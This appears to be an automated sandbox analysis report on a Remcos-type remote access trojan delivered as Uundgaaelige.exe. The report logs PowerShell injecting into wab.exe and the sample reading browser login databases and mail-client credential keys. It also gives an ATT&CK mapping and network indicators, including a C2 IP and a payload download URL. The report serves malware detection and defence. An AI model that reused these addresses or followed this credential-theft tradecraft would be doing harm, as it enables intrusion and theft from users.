              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5196 Thread sleep time: -111500s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2988 Thread sleep time: -285000s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2988 Thread sleep time: -28104000s >= -30000s
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405861
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_0040639C FindFirstFileA,FindClose,4_2_0040639C
              Source: C:\Users\user\Desktop\Uundgaaelige.exe Code function: 4_2_004026F8 FindFirstFileA,4_2_004026F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
              Source: wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Uundgaaelige.exe API call chain: ExitProcess graph end node graph_4-3326
              Source: C:\Users\user\Desktop\Uundgaaelige.exe API call chain: ExitProcess graph end node graph_4-3515
              Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node graph_13-34114
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 55F854
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl"
              Source: wab.exe, 0000000A.00000003.216310061267.0000000006C63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805079864.0000000006C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805079864.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805219077.0000000006C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageranager
              Source: wab.exe, 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP-
              Source: wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805079864.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805219077.0000000006C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerV
              Source: wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTypes\Type 001
              Source: wab.exe, 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager[
              Source: wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825323143.0000000006C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerY
              Source: wab.exe, 0000000A.00000003.216795138695.0000000006C63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795002903.0000000006C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerviderC
              Source: logs.dat.10.drBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,12_2_0041881C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040330D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\key4.db
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\places.sqlite
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: ESMTPPassword 13_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 13_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 13_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5328, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3652, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-P99HFC
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              DLL Side-Loading
              1
              Credentials In Files
              119
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets221
              Security Software Discovery
              SSH2
              Clipboard Data
              112
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Virtualization/Sandbox Evasion
              Cached Domain Credentials2
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              [Behavior graph. ID: 1473335, Sample: Uundgaaelige.exe, Start date: 15/07/2024, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label
              Uundgaaelige.exe | 5% | ReversingLabs |
              Uundgaaelige.exe | 14% | Virustotal |

              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll | 0% | Virustotal |
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dll | 0% | Virustotal |
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dll | 2% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dll | 0% | Virustotal |
              C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe | 5% | ReversingLabs |
              C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe | 14% | Virustotal |

              No Antivirus matches

              Source | Detection | Scanner | Label
              geoplugin.net | 1% | Virustotal |

              Source | Detection | Scanner | Label
              http://pesterbdd.com/images/Pester.png4 | 0% | Avira URL Cloud | safe
              http://www.imvu.comr | 0% | Avira URL Cloud | safe
              http://www.imvu.com/ | 0% | Avira URL Cloud | safe
              http://nuget.org/NuGet.exe | 0% | Avira URL Cloud | safe
              http://pesterbdd.com/images/Pester.png | 0% | Avira URL Cloud | safe
              http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
              172.93.222.25 | 0% | Avira URL Cloud | safe
              http://pesterbdd.com/images/Pester.png | 11% | Virustotal |
              http://geoplugin.net/json.gp. | 0% | Avira URL Cloud | safe
              http://pesterbdd.com/images/Pester.png4 | 10% | Virustotal |
              http://nuget.org/NuGet.exe | 0% | Virustotal |
              https://contoso.com/License | 0% | Avira URL Cloud | safe
              http://www.imvu.com | 0% | Avira URL Cloud | safe
              https://contoso.com/Icon | 0% | Virustotal |
              http://www.imvu.com | 0% | Virustotal |
              http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
              http://209.90.237.48/HMKcAbwpOCo117.bin | 0% | Virustotal |
              http://www.imvu.com/ | 0% | Virustotal |
              https://contoso.com/License | 0% | Virustotal |
              https://contoso.com/Icon | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp. | 0% | Virustotal |
              172.93.222.25 | 2% | Virustotal |
              http://209.90.237.48/HMKcAbwpOCo117.bin | 0% | Avira URL Cloud | safe
              http://nsis.sf.net/NSIS_ErrorError | 0% | Avira URL Cloud | safe
              https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
              http://www.apache.org/licenses/LICENSE-2.0.html4 | 0% | Avira URL Cloud | safe
              http://www.nirsoft.net | 0% | Avira URL Cloud | safe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp | 0% | Avira URL Cloud | safe
              https://www.google.com | 0% | Avira URL Cloud | safe
              http://www.nirsoft.net | 0% | Virustotal |
              https://github.com/Pester/Pester4 | 0% | Avira URL Cloud | safe
              https://github.com/Pester/Pester | 1% | Virustotal |
              http://nsis.sf.net/NSIS_ErrorError | 0% | Virustotal |
              http://www.apache.org/licenses/LICENSE-2.0.html4 | 0% | Virustotal |
              http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe
              http://geoplugin.net/json.gp | 7% | Virustotal |
              https://aka.ms/pscore6lB | 0% | Avira URL Cloud | safe
              https://contoso.com/ | 0% | Avira URL Cloud | safe
              https://nuget.org/nuget.exe | 0% | Avira URL Cloud | safe
              https://github.com/Pester/Pester4 | 0% | Virustotal |
              https://www.google.com | 0% | Virustotal |
              http://www.imvu.com/Xr= | 0% | Avira URL Cloud | safe
              http://nsis.sf.net/NSIS_Error | 0% | Virustotal |
              https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
              https://login.yahoo.com/config/login | 0% | Avira URL Cloud | safe
              http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
              https://aka.ms/pscore6lB | 0% | Virustotal |
              http://www.imvu.com/Pn | 0% | Avira URL Cloud | safe
              https://nuget.org/nuget.exe | 0% | Virustotal |
              https://www.google.com/accounts/servicelogin | 0% | Virustotal |
              http://www.imvu.comata | 0% | Avira URL Cloud | safe
              https://login.yahoo.com/config/login | 0% | Virustotal |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Avira URL Cloud | safe
              http://www.nirsoft.net/ | 0% | Virustotal |
              http://www.ebuddy.com | 0% | Avira URL Cloud | safe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Virustotal |
              http://www.ebuddy.com | 0% | Virustotal |
              https://contoso.com/ | 0% | Virustotal |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              geoplugin.net | 178.237.33.50 | true | false | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              172.93.222.25 | true | 2%, Virustotal; Avira URL Cloud: safe | unknown
              http://209.90.237.48/HMKcAbwpOCo117.bin | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
              http://geoplugin.net/json.gp | false | 7%, Virustotal; Avira URL Cloud: safe | unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://pesterbdd.com/images/Pester.png4powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 10%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.imvu.comrwab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 11%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.imvu.com/wab.exe, 00000012.00000002.216849181328.0000000002B7C000.00000004.00000010.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://geoplugin.net/json.gp.wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.imvu.comwab.exe, wab.exe, 0000000E.00000002.216328189876.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216849855991.000000000350D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217152613364.00000000034BD000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.nirsoft.netwab.exe, 0000000C.00000002.216343254639.00000000027E4000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862177214.0000000002A94000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168571301.0000000002B24000.00000004.00000010.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://nsis.sf.net/NSIS_ErrorErrorUundgaaelige.exe, Uundgaaelige.exe.7.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://www.google.comwab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
209.90.237.48 | unknown | United States | 136175 | SERVERHOSH-AS-APServerhoshInternetServiceNL | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
